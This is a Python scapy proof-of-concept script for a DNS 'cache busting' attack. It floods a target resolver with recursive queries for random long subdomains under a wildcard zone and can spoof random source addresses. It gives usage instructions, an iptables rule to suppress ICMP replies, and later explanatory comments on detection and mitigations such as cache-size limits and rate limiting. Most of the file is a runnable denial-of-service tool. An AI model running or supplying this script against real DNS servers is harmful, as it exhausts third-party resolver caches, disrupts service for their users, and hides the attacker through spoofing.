# DNS wildcard attack POC (cache busting?) | |
# | |
# DNS Server pwnage from a single host. This tool will clobber a DNS cache server. | |
# | |
# Theory | |
# Force a cache server to cache records for a DNS zone that will answer for non-existent domain names. http://en.wikipedia.org/wiki/Wildcard_DNS_record
# | |
# Example: *.godaddy.com | |
# | |
# Running on Ubuntu | |
# apt-get install python-scapy | |
# | |
# Make sure to drop ICMP Unreachable if not spoofing. Since we are not using the system connect() functions the kernel will ICMP unreach to victim (which may or may not impact the results of the attack). | |
# | |
# iptables -I OUTPUT -p icmp --icmp-type destination-unreachable -j DROP | |
# | |
# As root | |
# Example usage: python dnsb.py ns1.target.com 3.1.33.7 godaddy.com 10000 0 | |
# | |
# BIND 9 default max cache ttl is 7 days. | |
# max-cache-ttl sets the maximum time (in seconds) for which the server will cache positive answers (negative answers NXDOMAIN is defined by max-ncache-ttl). The default is one week (7 days). This statement may be used in view or a global options clause. | |
from scapy.all import * | |
import random | |
import string | |
import sys | |
# inet_ntoa | |
import socket | |
import struct | |
# Maximum subdomain length. Longer names consume more memory in the cache.
# This subdivision can go down to 127 levels deep, and each DNS label can contain up to 63 characters, as long as the whole domain name does not exceed a total length of 255 characters. | |
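def randomain(size=220, chars=string.ascii_letters + string.digits):
    """Return a random string of *size* characters drawn from *chars*.

    Args:
        size: number of characters to generate; 0 (or a negative value)
            yields the empty string.
        chars: alphabet to sample from. Defaults to ASCII letters plus
            digits. ``string.ascii_letters`` replaces the Python 2-only,
            locale-dependent ``string.letters`` so the helper also imports
            under Python 3.

    Returns:
        A ``str`` of length ``max(size, 0)``.
    """
    # `random` rather than `secrets`: the labels only have to differ from one
    # another; nothing here depends on them being unpredictable.
    return ''.join(random.choice(chars) for _ in range(size))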
# --- Script body ---------------------------------------------------------
# Defender's reading of what follows: each loop iteration emits one
# recursion-desired (rd=1) A-record query for a ~220-character random label
# under the wildcard zone, sent to `target` via scapy raw sockets. The
# observable signature on the resolver side is a burst of recursive queries
# for long, random, never-repeating names under a single zone, from one
# source (spoof=0) or from random sources (spoof=1). Bounding cache growth
# (e.g. BIND's max-cache-size alongside the max-cache-ttl mentioned in the
# header) and per-client rate limiting of recursive queries are the usual
# mitigations.
if(os.getuid())!=0:
    # Raw sockets need root. `os` is not imported explicitly in this file;
    # presumably supplied by `from scapy.all import *` -- TODO confirm.
    print "ERROR: Must be root to use raw sockets."
    sys.exit(1)
if (len(sys.argv) != 6):
    print "DNS Cache Busting attack Proof of concept"
    print "Usage: " + sys.argv[0] + " < target > < source > < wild card domain > < number of packets > < spoof 0 = off / 1 = on >"
    quit()
# Positional arguments. Nothing is validated: a non-numeric count or spoof
# flag raises ValueError here, and target/domain are passed through as given.
target=sys.argv[1]
# NOTE(review): `source` is parsed but never referenced again; the packet
# source address is `myip` (or a random address when spoof == 1).
source=sys.argv[2]
dlist=sys.argv[3]
num=int(sys.argv[4])
spoof=int(sys.argv[5])
# get local IP excluding loopback. A bit misleading, google's cache plays no part in the attack.
# connect() on a UDP socket sends no packet; it only makes the kernel pick
# the outbound address for that route, which getsockname() then reports.
myip=([(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1])
print "Sending packets to: "+target
for x in range(0, num):
    # If we want to spoof?
    if spoof == 1:
        # A fresh random 32-bit source address for this packet. Any reply or
        # ICMP error goes to that address, not to this host.
        randsource=socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
        myip=randsource
        print myip
    # generate random sub domain
    rdom=randomain()
    rd= rdom + '.' + dlist
    # send out packets :)
    # One A (qtype=1) / IN (qclass=1) question with recursion desired (rd=1),
    # a random UDP source port and a random DNS transaction id per packet.
    req = IP(dst=target,src=myip)/UDP(sport=random.randint(1025, 65000), dport=53)/DNS(id=random.randint(1025, 65000), opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,qd=DNSQR(qname=rd, qtype=1, qclass=1),an=0,ns=0,ar=0)
    send(req)